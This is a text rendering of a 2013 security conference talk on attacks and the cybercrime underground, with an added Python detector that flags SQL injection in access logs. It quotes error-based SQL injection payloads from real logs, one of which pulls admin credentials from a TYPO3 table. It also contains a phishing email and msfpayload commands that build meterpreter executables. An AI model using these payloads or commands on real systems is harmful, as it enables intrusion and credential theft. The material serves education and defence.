Attacchi, bugie e underground digitale (Attacks, lies and the digital underground) by Andrea Pompili

Is it possible that, after years of indiscriminate leaks, emptied bank accounts and persistent attacks of every shape and colour, nothing has changed?
Is it possible that, despite the OWASP Top 10 being cited ad nauseam and the desperate cries of the security gurus, certain habits remain so hard to kill?
Between truth and legend, we will try to understand what really matters to the poor attacker and what, unfortunately, is offered by a world of information technology perpetually dazzled by the myth of the magic box.

  1. ATTACCHI, BUGIE E UNDERGROUND DIGITALE (Attacks, lies and the digital underground)
     Speaker: Andrea Pompili
     "There are only 10 types of people in the world: those who understand binary, and those who don't."
     Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
     Andrea Pompili – apompili@hotmail.com – Xilogic Corp. – ROMA 20-23.03.2013 – www.codemotionworld.com
  3. > Clean-up and hardening carried out across the board a year earlier
     > Operating systems patched to the latest available version
     > Full logging of all site activity
     > 2 IPS (Intrusion Prevention System) systems in cascade
  4. 2012 statistics (Source: http://datalossdb.org/):
     Outside 70%
     Inside - Accidental 12%
     Inside - Malicious 9%
     Inside 5%
     Unknown 4%
  5. [Chart: overall attacks detected since 2007, percentages by year; series labels not recoverable from the extracted text]
     Source: OAI (Osservatorio sugli Attacchi Informatici in Italia), "Rapporto OAI 2012"
  6. [Chart: impact of detected attacks, percentages by year; series labels not recoverable from the extracted text]
     Source: OAI (Osservatorio sugli Attacchi Informatici in Italia), "Rapporto OAI 2012"
  7. «It is not the purpose of this "focus" to report the survey results in detail, but analysing the data on the average values for the whole sample, the results can be considered:
     • satisfactory for logical protection;
     • very satisfactory for infrastructure security;
     • sufficient for service security;
     • to be improved for organisational security.»
     «We can say we expected it»
  11. Aki Mon Telecom, Shane Atkinson, Canter & Siegel, Eddie Davidson, Peter Francis-Macrae, Davis Wolfgang Hawke, Jumpstart Technologies, Vandar Kushnir, Kevin Lipnitz, Wayne Mansfield, Oleg Nikolaenko, Alan Ralsky, Dave Rhodes, Scott Richter, Russian Business Network, iFrame Cash, SBT Telecom Network, Defcon Host, Micronnet Ltd., InstallsCash, Sendar Argic, Richard Colbert, RBNet
      Source: Panda Security, «The Cyber-crime Black Market: Uncovered» - 2011
  12. http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/
  14. (*) According to Frank Rieger, Chief Technology Officer at GSMK
  15. Source: Vincenzo Iozzo – OWASP Day 2012
  16. Source: Vincenzo Iozzo – OWASP Day 2012
  17. "So, how does one get full remote code execution in Chrome? In the case of Pinkie Pie's exploit, it took a chain of Six Different Bugs in order to successfully break out of the Chrome sandbox."
      (http://blog.chromium.org/2012/05/tale-of-two-pwnies-part-1.html)
      "Last year (2011), VUPEN released a video to demonstrate a successful sandbox escape against Chrome but Google challenged the validity of that hack, claiming it exploited third-party code, believed to be the Adobe Flash plugin."
      (http://www.zdnet.com/blog/security/pwn2own-2012-google-chrome-browser-sandbox-first-to-fall/10588)
  18. Blackhole Exploit Kit
      Cool Exploit Kit
  19. http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
  23. From: hdesk@rcs.it
      Sent: Thursday, November 04, 2004 7:48 PM
      To: xxxxxx@rcs.it
      Subject: Configuration update

      Hello,
      You are receiving this e-mail because problems have been detected with your e-mail account. The cause of these problems lies in an incorrect configuration of your computer, which we ask you to update by connecting to the following address:
      http://xxxx.rcs.it/software/av/index.html
      Please run the self-configuration script, Configurazione.vbe, whose link is available on the page indicated. When the configuration finishes, a message confirming the successful outcome of the update will appear.
      Best regards
      Help Desk - Technical Support RCS
      RCS Editori S.p.A. - Newspapers Division
  27. 173.254.216.69 - - [13/Nov/2012:20:03:35 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+order+by+1000+--+ HTTP/1.0"
      178.32.211.140 - - [13/Nov/2012:20:03:43 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+and(/*!select*/+1+/*!from*/ (/*!select*/+count(*),concat_ws(0x3a,substring((concat_ws(0x3b,user(),version(),database(),repeat(0x00,100))),1,64),floor(rand(0)*2))x+/*!from*/+/*!information_schema*/.tables+group+by+x)a)+--+"
  28. 89.253.105.39 - - [15/Nov/2012:12:32:14 +0100] "GET /some_path/some_file.html?tx_wfqbe_pi1[uid]=11502+and(select+1+from(select+count(*),concat_ws(0x3a,substring((SELECT+binary(concat(concat_ws(0x3a,username,password,admin),repeat(0x00,100)))+FROM+be_users+WHERE+admin=1+LIMIT+1,1),1,64),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.10"
      Web Shell Extension
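The log lines on slides 27 and 28 are exactly what a defender should be able to spot in the access log before (or instead of) relying on the IPS. The following is an added example, not code from the talk: it parses common-log entries, decodes each request's query string and scores it against the injection indicators visible in those lines. The indicator weights, the threshold and the benign request are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Common-log prefix: client IP, identd, user, [timestamp], then the quoted request line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\]\s*"(?P<req>[^"\u201d]*)')

# (regex on the decoded, lower-cased query string, weight, label). Patterns come from the
# probes on slides 27-28: order-by enumeration, information_schema lookups, error-based
# extraction via count(*)/rand()/group by, fingerprint functions, /*!...*/ obfuscation.
INDICATORS = [
    (r"\border\s+by\s+\d{3,}", 2, "order-by column enumeration"),
    (r"information_schema", 3, "information_schema reference"),
    (r"floor\s*\(\s*rand\s*\(", 3, "error-based extraction (floor/rand)"),
    (r"concat_ws\s*\(", 2, "concat_ws() data assembly"),
    (r"/\*!\s*\w+\s*\*/", 3, "MySQL versioned-comment obfuscation"),
    (r"\b(user|version|database)\s*\(\s*\)", 2, "server fingerprint function"),
    (r"\bfrom\s+be_users\b", 4, "TYPO3 backend user table"),
    (r"--\s*$", 1, "trailing SQL comment"),
]

def analyse_request(line):
    """Return (ip, score, reasons) for one access-log line, or None if it is not a request."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = m.group("req")
    target = req.split(" ", 1)[1] if " " in req else req     # drop the HTTP method
    target = re.sub(r"\s+HTTP/\d\.\d$", "", target)          # drop the protocol tag
    # '+' and %xx hide keywords from naive string matching; decode before scoring.
    decoded = unquote_plus(target.partition("?")[2]).lower()
    score, reasons = 0, []
    for pattern, weight, label in INDICATORS:
        if re.search(pattern, decoded):
            score += weight
            reasons.append(label)
    return m.group("ip"), score, reasons

def flag_sqli(lines, threshold=3):
    """Return the (ip, score, reasons) triples whose score reaches the threshold (assumed 3)."""
    return [r for r in map(analyse_request, lines) if r and r[1] >= threshold]

# Sample input: one constructed benign request plus the two probes shown on slide 27
# (closing quotes normalised to ASCII).
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Nov/2012:20:01:00 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1 HTTP/1.0" 200 5120',
    '173.254.216.69 - - [13/Nov/2012:20:03:35 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+order+by+1000+--+ HTTP/1.0"',
    '178.32.211.140 - - [13/Nov/2012:20:03:43 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+and(/*!select*/+1+/*!from*/ (/*!select*/+count(*),concat_ws(0x3a,substring((concat_ws(0x3b,user(),version(),database(),repeat(0x00,100))),1,64),floor(rand(0)*2))x+/*!from*/+/*!information_schema*/.tables+group+by+x)a)+--+"',
]

if __name__ == "__main__":
    for ip, score, reasons in flag_sqli(SAMPLE_LOG):
        print(f"{ip}: score {score}: {', '.join(reasons)}")
```

The low-scoring column-count probe is the earliest signal: it arrives seconds before the extraction query, so alerting on it gives time to block the source before any data leaves.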
  29. http://evader.stonesoft.com/
      http://insecure.org/stf/secnet_ids/secnet_ids.html
  31. msfpayload windows/meterpreter/bind_tcp X > moca_x86_tcp_4444.exe
  32. msfpayload windows/x64/meterpreter/bind_tcp X > moca_x64_tcp_4444.exe
  33. "The truth is, consumer-grade antivirus products can't protect against targeted malware created by well-resourced nation-states with bulging budgets. They can protect you against run-of-the-mill malware: banking trojans, keystroke loggers and e-mail worms. But targeted attacks like these go to great lengths to avoid antivirus products on purpose"
  34. <#1> Think like an attacker, so that you understand what they will do and how they will attack you
      <#2> Try to understand their objectives, the capabilities they have, but above all the operational constraints they have
      <#3> Identify the «perceived» value of what you want to defend, but above all what you want to defend
      <#4> Work on the whole defensive perimeter, without acts of faith
      <#5> If your defence is cheaper than the attack, you will always be ahead
  36. Domande? (Italian) · أيّة مطالب؟ (Arabic) · ¿Preguntas? (Spanish) · Questions? (English) · tupoQghachmey (Klingon) · (Sindarin) · (Japanese) · Ερωτήσεις? (Greek) · вопросы? (Russian)
